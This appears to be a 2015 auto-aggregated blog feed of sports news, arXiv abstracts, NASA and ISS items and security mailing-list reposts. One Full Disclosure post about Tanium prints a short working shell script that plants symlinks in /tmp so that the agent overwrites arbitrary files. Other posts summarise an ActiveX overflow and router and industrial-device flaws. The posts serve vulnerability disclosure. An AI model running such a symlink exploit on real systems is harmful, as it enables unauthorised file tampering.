Affected version=2.3.6

Vendor Homepage:http://ift.tt/1Jr8ed3

Software Link:http://ift.tt/1ROW0MT

The vulnerability lies in the COM component used by the product SkinCrafter.dll

SkinCrafter.dll version.1.9.2.0

Vulnerability tested on Windows Xp Sp3 (EN),with IE6

Author: metacom
Security Risk: ============== The security risk of the activex buffer overflow vulnerability is estimated as high. (CVSS 6.1) Credits & Authors: ================== metacom (PwC New Zealand) - [http://ift.tt/1ROW2Et] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: http://ift.tt/1jnqRwA - www.vuln-lab.com - http://ift.tt/1kouTut Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - http://ift.tt/1zNuo47 - http://ift.tt/1wo6y8x Social: http://twitter.com/#!/vuln_lab - http://ift.tt/1kouSqa - http://youtube.com/user/vulnerability0lab Feeds: http://ift.tt/1iS1DH0 - http://ift.tt/1kouSqh - http://ift.tt/1kouTKS Programs: http://ift.tt/1iS1GCs - http://ift.tt/1iS1FyF - http://ift.tt/1kouSqp Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™

Source: Gmail -> IFTTT-> Blogger

Benfica coach departs amid reports of shock switch to rival

LISBON, Portugal (AP) Benfica says it has terminated contract renewal negotiations with its coach Jorge Jesus amid reports he is headed to crosstown rival Sporting Lisbon.

from FOX Sports Digital http://ift.tt/1IonpU7
via IFTTT

Hijacking WhatsApp Account in Seconds Using This Simple Trick

The hugely popular smartphone messaging service WhatsApp, acquired by Facebook for over $20 billion last year, has reportedly been found to be prone to hijacking, making its hundreds of Millions of users vulnerable to, not just hackers, but also non-technical people. This trick lets anyone surrounds you to get effectively control over your WhatsApp account. The attacker needs nothing more


from The Hacker News http://ift.tt/1KeeCDu
via IFTTT

Ghana through but Argentina in anxious wait at U20 WCup

WELLINGTON, New Zealand (AP) Pre-tournament favorite Argentina faces the prospect of group-stage elimination from the Under-20 World Cup after drawing 0-0 with Austria on Friday in its last match in the round-robin stage.

from FOX Sports Digital http://ift.tt/1ARloNx
via IFTTT

UCSF Medical Center Announces Anonymous $50 Million Gift

The University of California, San Francisco has announced a $50 million gift from an anonymous donor in support of mental health services for adults, ...

from Google Alert - anonymous http://ift.tt/1AR9enV
via IFTTT

NGC 2419: Intergalactic Wanderer


Three objects stand out in this thoughtful telescopic image, a view toward the mostly stealthy constellation Lynx. The two brightest (the spiky ones) are nearby stars. The third is the remote globular star cluster NGC 2419, at distance of nearly 300,000 light-years. NGC 2419 is sometimes called "the Intergalactic Wanderer", an appropriate title considering that the distance to the Milky Way's satellite galaxy, the Large Magellanic Cloud, is only about 160,000 light-years. Roughly similar to other large globular star clusters like Omega Centauri, NGC 2419 is itself intrinsically bright, but appears faint because it is so far away. NGC 2419 may really have an extragalactic origin as, for example, the remains of a small galaxy captured and disrupted by the Milky Way. But its extreme distance makes it difficult to study and compare its properties with other globular clusters that roam the halo of our Milky Way galaxy. via NASA http://ift.tt/1Q8BcSQ

Thursday, June 4, 2015

Encoding Markov Logic Networks in Possibilistic Logic. (arXiv:1506.01432v1 [cs.AI])

Markov logic uses weighted formulas to compactly encode a probability distribution over possible worlds. Despite the use of logical formulas, Markov logic networks (MLNs) can be difficult to interpret, due to the often counter-intuitive meaning of their weights. To address this issue, we propose a method to construct a possibilistic logic theory that exactly captures what can be derived from a given MLN using maximum a posteriori (MAP) inference. Unfortunately, the size of this theory is exponential in general. We therefore also propose two methods which can derive compact theories that still capture MAP inference, but only for specific types of evidence. These theories can be used, among others, to make explicit the hidden assumptions underlying an MLN or to explain the predictions it makes.



from cs.AI updates on arXiv.org http://ift.tt/1RNDAMh
via IFTTT

Abstractive Multi-Document Summarization via Phrase Selection and. (arXiv:1506.01597v1 [cs.CL])

We propose an abstraction-based multi-document summarization framework that can construct new sentences by exploring more fine-grained syntactic units than sentences, namely, noun/verb phrases. Different from existing abstraction-based approaches, our method first constructs a pool of concepts and facts represented by phrases from the input documents. Then new sentences are generated by selecting and merging informative phrases to maximize the salience of phrases and meanwhile satisfy the sentence construction constraints. We employ integer linear optimization for conducting phrase selection and merging simultaneously in order to achieve the global optimal solution for a summary. Experimental results on the benchmark data set TAC 2011 show that our framework outperforms the state-of-the-art models under automated pyramid evaluation metric, and achieves reasonably well results on manual linguistic quality evaluation.



from cs.AI updates on arXiv.org http://ift.tt/1GnIBcy
via IFTTT

Verification of Generalized Inconsistency-Aware Knowledge and Action Bases (Extended Version). (arXiv:1504.08108v2 [cs.AI] UPDATED)

Knowledge and Action Bases (KABs) have been put forward as a semantically rich representation of a domain, using a DL KB to account for its static aspects, and actions to evolve its extensional part over time, possibly introducing new objects. Recently, KABs have been extended to manage inconsistency, with ad-hoc verification techniques geared towards specific semantics. This work provides a twofold contribution along this line of research. On the one hand, we enrich KABs with a high-level, compact action language inspired by Golog, obtaining so called Golog-KABs (GKABs). On the other hand, we introduce a parametric execution semantics for GKABs, so as to elegantly accomodate a plethora of inconsistency-aware semantics based on the notion of repair. We then provide several reductions for the verification of sophisticated first-order temporal properties over inconsistency-aware GKABs, and show that it can be addressed using known techniques, developed for standard KABs.



from cs.AI updates on arXiv.org http://ift.tt/1QR3lf8
via IFTTT

I have a new follower on Twitter


Gloria Aguilar
Habil y proactiva. Cheff profesional e internacional. Trabajando en España.
Girona España

Following: 274 - Followers: 55

June 04, 2015 at 07:15PM via Twitter http://twitter.com/GAguuiiii

Orioles Highlight: Adam Jones hits tiebreaking solo HR in 8th inning in 3-2 win over Astros, halts 5-game losing streak (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

[FD] Broken, Abandoned, and Forgotten Code, Part 7

Part 7 is up! We further refine the undocumented firmware header for the Netgear R6200 SOHO router. A couple of additional checksum and size fields are added as well as a packed version string field. http://ift.tt/1FWHnBI Only 5 bytes in the 58 byte header remain unidentified, which is sufficient for the web interface to happily accept our custom firmware image. Of course we haven't started customizing the contents of the firmware yet; that will come in a later post. We'll need to generate customized firmware for use as a payload when exploiting the SetFirmware SOAP action described in parts 1-4. If you missed my post to Full Disclosure where I introduced the series, here's that: http://ift.tt/1F6IUWA As always I welcome feedback via email or Twitter. I'm @zcutlip. I hope you enjoy it! Cheers, Zach

Source: Gmail -> IFTTT-> Blogger

[FD] [CVE-2015-4051]: Beckhoff IPC diagnostics < 1.8 : Authentication bypass

Beckhoff IPC diagnostics < 1.8 : Authentication bypass ====================================================== CVE number: CVE-2015-4051 Permalink: http://ift.tt/1Kd4ScH Vendor advisory: http://ift.tt/1KHlKqd -- Info

Source: Gmail -> IFTTT-> Blogger

[FD] [CVE-2015-1234] Tanium all versions arbitrary file overwrite

############################################################## # # # TANIUM ALL VERSIONS ARBITRARY FILE OVERWRITE # # # # TANIUM allows lowest privileged users on # # Linux and Mac systems to overwrite any file # # of their choosing in 15 seconds. # # # # Impossible? Think again. # # # ############################################################## Step 1: #!/bin/sh i=0; j=$(cat /proc/sys/kernel/pid_max) while true; do ln -s $1 /tmp/tanium.$i [ $i -eq $j ] && break i=$((i+1)) done Step 2: Execute Established Connections sensor. Step 3: ??? Step 4: Profit!

Source: Gmail -> IFTTT-> Blogger

While heads roll, a FIFA-backed movie opens in the US

NEW YORK (AP) The FIFA saga, already awash in alleged corruption, international intrigue and long-arm justice, can now add irony to its unwinding tale.

from FOX Sports Digital http://ift.tt/1Mqp1ew
via IFTTT

In Trinidad, former FIFA executive seen as 'our Robin Hood'

PORT-OF-SPAIN, Trinidad (AP) In one moment, Jack Warner is on TV telling his countrymen he fears for his life. An hour later, he's standing on a packed narrow street at a political rally, boasting that he fears nothing.

from FOX Sports Digital http://ift.tt/1dPJDlj
via IFTTT

Juventus acquires Dybala from Palermo for 32 million euros

TURIN, Italy (AP) Juventus has acquired Argentine forward Paulo Dybala from Palermo for 32 million euros ($36 million).

from FOX Sports Digital http://ift.tt/1cA7Vy5
via IFTTT

Bob’s Tips & Tricks (June 2015)

BlogCartoon5
Bob’s Tips & Tricks (June 2015)

Click inside the box below to enlarge.
June TandT




from The 'hotspot' for all things Bob Ross. http://ift.tt/1H57okx
via IFTTT

Take the Bob Ross Quiz (June 2015)

BlogCartoon3

Test your knowledge of the Bob Ross TV show, painting techniques and general Bob Ross trivia!




from The 'hotspot' for all things Bob Ross. http://ift.tt/1dhyJUg
via IFTTT

Why World Cup sponsors aren't bailing out

NEW YORK (AP) How much scandal is too much scandal?

from FOX Sports Digital http://ift.tt/1JoCANd
via IFTTT

Barca, Juve can show game's good side amid FIFA bribes shame

BERLIN (AP) After one of soccer's most destructive scandals, the task facing Barcelona and Juventus in the Champions League final on Saturday seems simple. Showing the sport at its best, with an entertaining demonstration of artistry, should ensure that the limelight swings back on the players for at least a couple of hours.

from FOX Sports Digital http://ift.tt/1RMueAo
via IFTTT

Walter Zenga replaces Mihajlovic as Sampdoria coach

GENOA, Italy (AP) Former Italy goalkeeper Walter Zenga is replacing Sinisa Mihajlovic as Sampdoria coach.

from FOX Sports Digital http://ift.tt/1KOI44n
via IFTTT

New Pics Added to the Blog Gallery (June 4, 2015)

BlogCartoon4
New Pics Added to the Blog Gallery! (June 4, 2015)

Click link below to visit gallery now!
http://ift.tt/1HAGoHC




from The 'hotspot' for all things Bob Ross. http://ift.tt/1FW6tk2
via IFTTT

ISS Daily Summary Report – 06/03/2015

Fluid Shifts:  Fluid Shifts operations continued today in the Russian Service Module (SM).  Kelly donned the Lower Body Negative Pressure (LBNP/Chibis) device while Kornienko, with ground support in Moscow, assisted with medical monitoring.  While Kelly was subjected to the negative pressure (pulling the fluid toward the feet), Padalka, with remote guidance in Houston, performed measurements with Distortion Product Otoacoustic Emissions (DPOAE), Optical Coherence Tomography (OCT), and Tonometry measurements. Fluid Shifts is a joint NASA-Russian experiment that investigates the causes for severe and lasting physical changes to astronaut’s eyes. Because the headward fluid shift is a hypothesized contributor to these changes, reversing this fluid shift with a lower body negative pressure device is investigated as a possible intervention. Results from this study may help to develop preventative measures against lasting changes in vision and eye damage. Haptics-2: Virts completed an On-Board Training (OBT) session and loaded the Haptics-2 software updates from Haptics-1 to Haptics-2.  He then executed protocol one of two protocols. Haptics-2 is a technology demonstration experiment to validate for the first time a bilateral control interaction to take place between space and ground. Haptics-2 will compare the performance achievable through two different communication links: an IP forward link through Tracking and Data Relay Satellite System (TDRSS) with substantial amount of time-delay and high bandwidth and, (B) a direct S-band link through the KONTUR-2 system which has a short time-delay and reduced bandwidth. Haptics-2 consists of 2 independent experiment protocols aimed at quantifying the performance characteristics of the two different communication channels between space and ground (pre-test) and aimed at demonstrating for the first time real bilateral teleoperation with force-feedback to take place between space and ground through both communication links. Wearable Monitoring: Prior to sleep, Cristoforetti set up hardware and donned the Wearable Monitoring Vest for data acquisition during sleep. This is the final of six planned sessions. The experiment validates a new cloth vest that monitors astronaut heart rates and breathing patterns during sleep. It also collects data to investigate whether changes in heart activity are related to astronauts’ poor sleep quality. Current technology cannot check astronauts’ heart activity while they sleep because the test wakes them. The Wearable Monitor is a lightweight vest with silver wires and sensors embedded into the fabric, making it more comfortable to wear. Extravehicular Mobility Unit (EMU) 3010 Fan Pump Separator (FPS) Remove & Replace (R&R): Virts and Cristoforetti completed Part 1 of 2 to R&R the failed FPS in EMU 3010. They set up the Airlock, retrieved and assembled the necessary equipment and prepared the EMU for the removal tomorrow. On Friday, the crew will pack the removed FPS for return on 41 Soyuz (41S).  Today’s Planned Activities All activities were completed unless otherwise noted. FLUID SHIFTS. Comm configuration for the experiment HRF Generic Refrigerated Centrifuge Configure FLUID SHIFTS. Gathering and Connecting Equipment for TV coverage HAPTICS-2 ops in rack mounted config HRF Generic Refrigerated Centrifuge Configure Replace battery pack in CDM, activate and don CDM for CDM Crew Worn session HRF Generic Refrigerated Centrifuge Spin Conclude Fluid Shifts OCT Service Module Setup FLUID SHIFTS. RS HRF connection to ППС-26 (instead of RSE-Med) HRF Generic Sample MELFI Insertion EDV (SV) Filling (Separation) Fluid Shifts CCFP Service Module Configuration EMU FPS R&R Part 1 FLUID SHIFTS. Assistance with Chibis and Gamma-1 Fluid Shifts Experiment Service Module Data Collection Subject Life On The Station Photo and Video Fluid Shifts Tonometry Service Module Stow Fluid Shifts OCT Service Module Power Off HRF Generic Frozen Blood Collection Conclude And Stow HRF Generic Urine Collection Stow Replacement of Vozdukh Atmosphere Purification System [СОА] Assemblies On MCC Go Mating Vozdukh TLM-connectors Verification of ИП-1 Flow Sensor Position Cleaning FGB ЦВ1 Circulation Fan Screens European Modular Cultivation System (EMCS) Pressure Relief Valve Check LBNP Exercise (PRELIMINARY) WPA Waste Water Tank Offload into CWC initiate PAO HD config PAO prep PAO event MELFI 2 Ice Brick Insert 2 Troubleshooting FGB Power Supply System and СУБК devices Rodent Research CASIS Dissection Gather HAPTICS-2 1B and 2B protocols OBT PK-4 Experiment Run Hematocrit  Hardware Setup Configure ER5 laptop to point to the PEHG 2 Gateway to allow Remote Desktop access through Ku Forward RGN Recycle Tank Fill CB valve checkout HAPTICS photo documentation Crew departure prep HAPTICS-2 protocol 1B ops [Aborted] HAPTICS-2 ops conclude Completed Task List Items None Ground Activities All activities were completed unless otherwise noted. FPS R&R ops Fluid Shifts ops Three-Day Look Ahead: Thursday, 06/04: FPS R&R Part 2, Fluid Shifts Friday, 06/05: PMM cleanup, EVA FPS pack for return Saturday, 06/06: Crew off duty, housekeeping QUICK ISS Status – Environmental Control Group:                               Component Status Elektron Off Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) Off [СКВ] 2 – SM Air Conditioner System (“SKV2”) On Carbon Dioxide Removal Assembly (CDRA) Lab Standby Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Shutdown Major Constituent Analyzer (MCA) Node 3 Operate Oxygen Generation Assembly (OGA) Process Urine Processing Assembly (UPA) Process Trace Contaminant Control System (TCCS) Lab Off Trace Contaminant Control System (TCCS) Node 3 Full Up  

from ISS On-Orbit Status Report http://ift.tt/1czA34u
via IFTTT

PHOTO GALLERY: Great finals in European Cup history

LONDON (AP) In the 60 years since Partizan Belgrade and Sporting Lisbon played out a 3-3 draw in the first European Cup match, the competition now known as Champions League has become the most important club football tournament in the world.

from FOX Sports Digital http://ift.tt/1Gmyuog
via IFTTT

Advocaat has change of heart, signs new deal with Sunderland

SUNDERLAND, England (AP) Dick Advocaat has signed a one-year deal as Sunderland manager, a week after saying he would not be continuing at the club after securing its Premier League status last season as an interim coach.

from FOX Sports Digital http://ift.tt/1Kc8mMB
via IFTTT

Chiellini out of Champions League final, no Suarez reunion

TURIN, Italy (AP) Juventus defender Giorgio Chiellini has been ruled out of the Champions League final against Barcelona because of a left calf injury, robbing the Italian side of one of its most important players.

from FOX Sports Digital http://ift.tt/1GmvhoS
via IFTTT

Barcelona names full squad for Champions League final

BARCELONA, Spain (AP) Barcelona coach Luis Enrique has named a 26-man squad to travel to Berlin for Saturday's Champions League final.

from FOX Sports Digital http://ift.tt/1Q9lWFy
via IFTTT

Barcelona extends Pedro's contract through 2019

BARCELONA, Spain (AP) Barcelona says forward Pedro Rodriguez has agreed to sign a new contract that will keep him at the Spanish champions until the end of the 2018-19 season.

from FOX Sports Digital http://ift.tt/1eR1gkI
via IFTTT

South African police investigating World Cup bribes

CAPE TOWN, South Africa (AP) South Africa's organized and serious crime unit said Thursday it was conducting a ''preliminary'' investigation into bribery allegations surrounding the 2010 World Cup bid.

from FOX Sports Digital http://ift.tt/1KbETCq
via IFTTT

Belgium rises to No. 2 in FIFA rankings led by Germany

ZURICH (AP) Belgium has risen above Argentina to No. 2 in the monthly FIFA rankings, which are still topped by World Cup winner Germany.

from FOX Sports Digital http://ift.tt/1GmaxgR
via IFTTT

Fiji surprises Honduras at Under-20 World Cup

WELLINGTON, New Zealand (AP) Fiji pulled off a major upset at the Under-20 World Cup by beating Honduras 3-0 Thursday, boosting its chances of making it to the knockout round.

from FOX Sports Digital http://ift.tt/1HM49u6
via IFTTT

Liverpool to sign James Milner on free transfer

LIVERPOOL, England (AP) Liverpool will sign James Milner on a free transfer on July 1 once the England midfielder's contract at Manchester City expires.

from FOX Sports Digital http://ift.tt/1IfwDz3
via IFTTT

Fiji shocks Honduras at Under-20 World Cup

WELLINGTON, New Zealand (AP) Fiji has pulled off a major upset at the Under-20 World Cup by beating Honduras 3-0 on Thursday, boosting its chances of making it to the knockout rounds.

from FOX Sports Digital http://ift.tt/1ALHWQ6
via IFTTT

Reports: Mihajlovic to replace Inzaghi at AC Milan

MILAN (AP) Sinisa Mihajlovic is reportedly near to being announced as the new coach of struggling AC Milan.

from FOX Sports Digital http://ift.tt/1FVrPOv
via IFTTT

FIFA: Blatter resignation won't lead many to quit

RIO DE JANEIRO (AP) A consistent ally of Sepp Blatter, Danny Jordaan already has a new job.

from FOX Sports Digital http://ift.tt/1IffiGA
via IFTTT

I have a new follower on Twitter


Sigrun Paulissen
Typical zombie nerd
stillwater, ny

Following: 1481 - Followers: 1302

June 04, 2015 at 02:17AM via Twitter http://twitter.com/sigrunpaulissen

Former FIFA VP Warner makes televised address in Trinidad

MARABELLA, Trinidad (AP) Former FIFA vice president Jack Warner made a televised address in Trinidad on Wednesday night, saying he will prove a link between soccer's governing body and his nation's elections in 2010.

from FOX Sports Digital http://ift.tt/1Jna6Ub
via IFTTT

Flyby Image of Saturns Sponge Moon Hyperion


Why does this moon look like a sponge? To better investigate, NASA and ESA sent the Saturn-orbiting robotic spacecraft Cassini zooming past Saturn's moon Hyperion, once again, earlier this week. One of the images beamed back to Earth is featured above, raw and unprocessed. Visible, as expected, are many unusually shaped craters with an unusual dark material at the bottom. Although Hyperion spans about 250 kilometers, its small gravitational tug on Cassini indicates that it is mostly empty space and so has very low surface gravity. Therefore, the odd shapes of many of Hyperion's craters are thought to result from impacts that primarily compress and eject surface material -- instead of the more typical round craters that appear after a circular shock wave that explosively redistributes surface material. Cassini is on track for another flyby of Saturn's Dione in about two weeks. via NASA http://ift.tt/1FrXpjD

I have a new follower on Twitter


Princess Bayside
Discover the ultimate in fun and relaxation at the Princess Bayside Beach Hotel.
Bayfront, Ocean City, MD
http://t.co/SuLFMbwU7U
Following: 1506 - Followers: 369

June 04, 2015 at 12:48AM via Twitter http://twitter.com/PrincessBayside

Wednesday, June 3, 2015

Jordan Morris added to US roster vs Netherlands, Germany

CHICAGO (AP) Stanford forward Jordan Morris has been added to the U.S. roster for exhibition games at the Netherlands and Germany.

from FOX Sports Digital http://ift.tt/1SXlXex
via IFTTT

Orioles Video: Miguel Gonzalez 6.2 IP, allows 3 ER, Adam Jones 2-for-4 in 3-1 loss to Astros (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Former FIFA VP Warner makes televised address in Trinidad

MARABELLA, Trinidad (AP) Former FIFA vice president Jack Warner made a televised address in Trinidad on Wednesday night, saying he will prove a link between soccer's governing body and his nation's elections in 2010.

from FOX Sports Digital http://ift.tt/1FvbTAn
via IFTTT

Performing Bayesian Risk Aggregation using Discrete Approximation Algorithms with Graph Factorization. (arXiv:1506.01056v1 [cs.AI])

Risk aggregation is a popular method used to estimate the sum of a collection of financial assets or events, where each asset or event is modelled as a random variable. Applications, in the financial services industry, include insurance, operational risk, stress testing, and sensitivity analysis, but the problem is widely encountered in many other application domains. This thesis has contributed two algorithms to perform Bayesian risk aggregation when model exhibit hybrid dependency and high dimensional inter-dependency. The first algorithm operates on a subset of the general problem, with an emphasis on convolution problems, in the presence of continuous and discrete variables (so called hybrid models) and the second algorithm offer a universal method for general purpose inference over much wider classes of Bayesian Network models.



from cs.AI updates on arXiv.org http://ift.tt/1Glsyfk
via IFTTT

Quizz: Targeted crowdsourcing with a billion (potential) users. (arXiv:1506.01062v1 [cs.AI])

We describe Quizz, a gamified crowdsourcing system that simultaneously assesses the knowledge of users and acquires new knowledge from them. Quizz operates by asking users to complete short quizzes on specific topics; as a user answers the quiz questions, Quizz estimates the user's competence. To acquire new knowledge, Quizz also incorporates questions for which we do not have a known answer; the answers given by competent users provide useful signals for selecting the correct answers for these questions. Quizz actively tries to identify knowledgeable users on the Internet by running advertising campaigns, effectively leveraging the targeting capabilities of existing, publicly available, ad placement services. Quizz quantifies the contributions of the users using information theory and sends feedback to the advertisingsystem about each user. The feedback allows the ad targeting mechanism to further optimize ad placement.

Our experiments, which involve over ten thousand users, confirm that we can crowdsource knowledge curation for niche and specialized topics, as the advertising network can automatically identify users with the desired expertise and interest in the given topic. We present controlled experiments that examine the effect of various incentive mechanisms, highlighting the need for having short-term rewards as goals, which incentivize the users to contribute. Finally, our cost-quality analysis indicates that the cost of our approach is below that of hiring workers through paid-crowdsourcing platforms, while offering the additional advantage of giving access to billions of potential users all over the planet, and being able to reach users with specialized expertise that is not typically available through existing labor marketplaces.



from cs.AI updates on arXiv.org http://ift.tt/1BL5mQq
via IFTTT

Fast Generation of Best Interval Patterns for Nonmonotonic Constraints. (arXiv:1506.01071v1 [cs.AI])

In pattern mining, the main challenge is the exponential explosion of the set of patterns. Typically, to solve this problem, a constraint for pattern selection is introduced. One of the first constraints proposed in pattern mining is support (frequency) of a pattern in a dataset. Frequency is an anti-monotonic function, i.e., given an infrequent pattern, all its superpatterns are not frequent. However, many other constraints for pattern selection are neither monotonic nor anti-monotonic, which makes it difficult to generate patterns satisfying these constraints. In this paper we introduce the notion of "generalized monotonicity" and Sofia algorithm that allow generating best patterns in polynomial time for some nonmonotonic constraints modulo constraint computation and pattern extension operations. In particular, this algorithm is polynomial for data on itemsets and interval tuples. In this paper we consider stability and delta-measure which are nonmonotonic constraints and apply them to interval tuple datasets. In the experiments, we compute best interval tuple patterns w.r.t. these measures and show the advantage of our approach over postfiltering approaches.

KEYWORDS: Pattern mining, nonmonotonic constraints, interval tuple data



from cs.AI updates on arXiv.org http://ift.tt/1Glsyfi
via IFTTT

Homogeneous Spiking Neuromorphic System for Real-World Pattern Recognition. (arXiv:1506.01072v1 [cs.NE])

A neuromorphic chip that combines CMOS analog spiking neurons and memristive synapses offers a promising solution to brain-inspired computing, as it can provide massive neural network parallelism and density. Previous hybrid analog CMOS-memristor approaches required extensive CMOS circuitry for training, and thus eliminated most of the density advantages gained by the adoption of memristor synapses. Further, they used different waveforms for pre and post-synaptic spikes that added undesirable circuit overhead. Here we describe a hardware architecture that can feature a large number of memristor synapses to learn real-world patterns. We present a versatile CMOS neuron that combines integrate-and-fire behavior, drives passive memristors and implements competitive learning in a compact circuit module, and enables in-situ plasticity in the memristor synapses. We demonstrate handwritten-digits recognition using the proposed architecture using transistor-level circuit simulations. As the described neuromorphic architecture is homogeneous, it realizes a fundamental building block for large-scale energy-efficient brain-inspired silicon chips that could lead to next-generation cognitive computing.



from cs.AI updates on arXiv.org http://ift.tt/1BL5mQn
via IFTTT

Traversing Knowledge Graphs in Vector Space. (arXiv:1506.01094v1 [cs.CL])

Path queries on a knowledge graph can be used to answer compositional questions such as "What languages are spoken by people living in Lisbon?". However, knowledge graphs often have missing facts (edges) which disrupts path queries. Recent models for knowledge base completion impute missing facts by embedding knowledge graphs in vector spaces. We show that these models can be recursively applied to answer path queries, but that they suffer from cascading errors. This motivates a new "compositional" training objective, which dramatically improves all models' ability to answer path queries, in some cases more than doubling accuracy. On a standard knowledge base completion task, we also demonstrate that compositional training acts as a novel form of structural regularization, reliably improving performance across all base models (reducing errors by up to 43%) and achieving new state-of-the-art results.



from cs.AI updates on arXiv.org http://ift.tt/1IeAxZ5
via IFTTT

A Game-Theoretic Model and Best-Response Learning Method for Ad Hoc Coordination in Multiagent Systems. (arXiv:1506.01170v1 [cs.GT])

The ad hoc coordination problem is to design an autonomous agent which is able to achieve optimal flexibility and efficiency in a multiagent system with no mechanisms for prior coordination. We conceptualise this problem formally using a game-theoretic model, called the stochastic Bayesian game, in which the behaviour of a player is determined by its private information, or type. Based on this model, we derive a solution, called Harsanyi-Bellman Ad Hoc Coordination (HBA), which utilises the concept of Bayesian Nash equilibrium in a planning procedure to find optimal actions in the sense of Bellman optimal control. We evaluate HBA in a multiagent logistics domain called level-based foraging, showing that it achieves higher flexibility and efficiency than several alternative algorithms. We also report on a human-machine experiment at a public science exhibition in which the human participants played repeated Prisoner's Dilemma and Rock-Paper-Scissors against HBA and alternative algorithms, showing that HBA achieves equal efficiency and a significantly higher welfare and winning rate.



from cs.AI updates on arXiv.org http://ift.tt/1BL5mQd
via IFTTT

A density compensation-based path computing model for measuring semantic similarity. (arXiv:1506.01245v1 [cs.AI])

The shortest path between two concepts in a taxonomic ontology is commonly used to represent the semantic distance between concepts in the edge-based semantic similarity measures. In the past, the edge counting is considered to be the default method for the path computation, which is simple, intuitive and has low computational complexity. However, a large lexical taxonomy of such as WordNet has the irregular densities of links between concepts due to its broad domain but. The edge counting-based path computation is powerless for this non-uniformity problem. In this paper, we advocate that the path computation is able to be separated from the edge-based similarity measures and form various general computing models. Therefore, in order to solve the problem of non-uniformity of concept density in a large taxonomic ontology, we propose a new path computing model based on the compensation of local area density of concepts, which is equal to the number of direct hyponyms of the subsumers of concepts in their shortest path. This path model considers the local area density of concepts as an extension of the edge-based path and converts the local area density divided by their depth into the compensation for edge-based path with an adjustable parameter, which idea has been proven to be consistent with the information theory. This model is a general path computing model and can be applied in various edge-based similarity algorithms. The experiment results show that the proposed path model improves the average correlation between edge-based measures with human judgments on Miller and Charles benchmark from less than 0.8 to more than 0.85, and has a big advantage in efficiency than information content (IC) computation in a dynamic ontology, thereby successfully solving the non-uniformity problem of taxonomic ontology.



from cs.AI updates on arXiv.org http://ift.tt/1GlsA6X
via IFTTT

Summarization of Films and Documentaries Based on Subtitles and Scripts. (arXiv:1506.01273v1 [cs.CL])

We assess the performance of generic text summarization algorithms applied to films and documentaries, using the well-known behavior of summarization of news articles as reference. We use three datasets: (i) news articles, (ii) film scripts and subtitles, and (iii) documentary subtitles. Standard ROUGE metrics are used for comparing generated summaries against news abstracts, plot summaries, and synopses. We show that the best performing algorithms are LSA, for news articles and documentaries, and LexRank and Support Sets, for films. Despite the different nature of films and documentaries, their relative behavior is in accordance with that obtained for news articles.



from cs.AI updates on arXiv.org http://ift.tt/1BL5nnn
via IFTTT

Probabilistic Numerics and Uncertainty in Computations. (arXiv:1506.01326v1 [math.NA])

We deliver a call to arms for probabilistic numerical methods: algorithms for numerical tasks, including linear algebra, integration, optimization and solving differential equations, that return uncertainties in their calculations. Such uncertainties, arising from the loss of precision induced by numerical calculation with limited time or hardware, are important for much contemporary science and industry. Within applications such as climate science and astrophysics, the need to make decisions on the basis of computations with large and complex data has led to a renewed focus on the management of numerical uncertainty. We describe how several seminal classic numerical methods can be interpreted naturally as probabilistic inference. We then show that the probabilistic view suggests new algorithms that can flexibly be adapted to suit application specifics, while delivering improved empirical performance. We provide concrete illustrations of the benefits of probabilistic numeric algorithms on real scientific problems from astrometry and astronomical imaging, while highlighting open problems with these new algorithms. Finally, we describe how probabilistic numerical methods provide a coherent framework for identifying the uncertainty in calculations performed with a combination of numerical algorithms (e.g. both numerical optimisers and differential equation solvers), potentially allowing the diagnosis (and control) of error sources in computations.



from cs.AI updates on arXiv.org http://ift.tt/1G78viP
via IFTTT

A Distance-based Paraconsistent Semantics for DL-Lite. (arXiv:1301.2005v3 [cs.AI] UPDATED)

DL-Lite is an important family of description logics. Recently, there is an increasing interest in handling inconsistency in DL-Lite as the constraint imposed by a TBox can be easily violated by assertions in ABox in DL-Lite. In this paper, we present a distance-based paraconsistent semantics based on the notion of feature in DL-Lite, which provides a novel way to rationally draw meaningful conclusions even from an inconsistent knowledge base. Finally, we investigate several important logical properties of this entailment relation based on the new semantics and show its promising advantages in non-monotonic reasoning for DL-Lite.



from cs.AI updates on arXiv.org http://ift.tt/11kXUwJ
via IFTTT

A generalized back-door criterion. (arXiv:1307.5636v3 [stat.ME] UPDATED)

We generalize Pearl's back-door criterion for directed acyclic graphs (DAGs) to more general types of graphs that describe Markov equivalence classes of DAGs and/or allow for arbitrarily many hidden variables. We also give easily checkable necessary and sufficient graphical criteria for the existence of a set of variables that satisfies our generalized back-door criterion, when considering a single intervention and a single outcome variable. Moreover, if such a set exists, we provide an explicit set that fulfills the criterion. We illustrate the results in several examples. R-code is available in the R-package pcalg.



from cs.AI updates on arXiv.org http://ift.tt/1bHp3ze
via IFTTT

Optimal high-level descriptions of dynamical systems. (arXiv:1409.7403v2 [cs.IT] UPDATED)

To analyze high-dimensional systems, many fields in science and engineering rely on high-level descriptions, sometimes called "macrostates," "coarse-grainings," or "effective theories". Examples of such descriptions include the thermodynamic properties of a large collection of point particles undergoing reversible dynamics, the variables in a macroeconomic model describing the individuals that participate in an economy, and the summary state of a cell composed of a large set of biochemical networks.

